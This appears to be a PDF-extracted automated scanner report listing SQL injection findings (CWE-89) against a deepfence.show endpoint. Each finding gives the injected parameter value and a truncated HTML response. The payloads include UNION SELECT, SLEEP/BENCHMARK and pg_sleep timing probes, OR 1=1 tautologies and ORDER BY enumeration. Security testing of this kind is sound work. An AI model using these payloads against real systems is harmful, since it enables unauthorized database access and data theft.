src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #813\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,\nNULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #814\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@\ndeepfence.io\"*\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #815\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io1)) or sleep(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #816\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary \nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #817\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19Response Content-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #818\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89Issue Number #819\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io''\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #820\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #821\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(\n88)+CHAR(88)+CHAR(88)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #822\nScan SQL InjectionSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #823\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioadmin' or 1=1#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #824\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 10#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #825\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@deepfence.io 1)) or pg_sleep(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #826\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io\" OR \"\" = \"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" 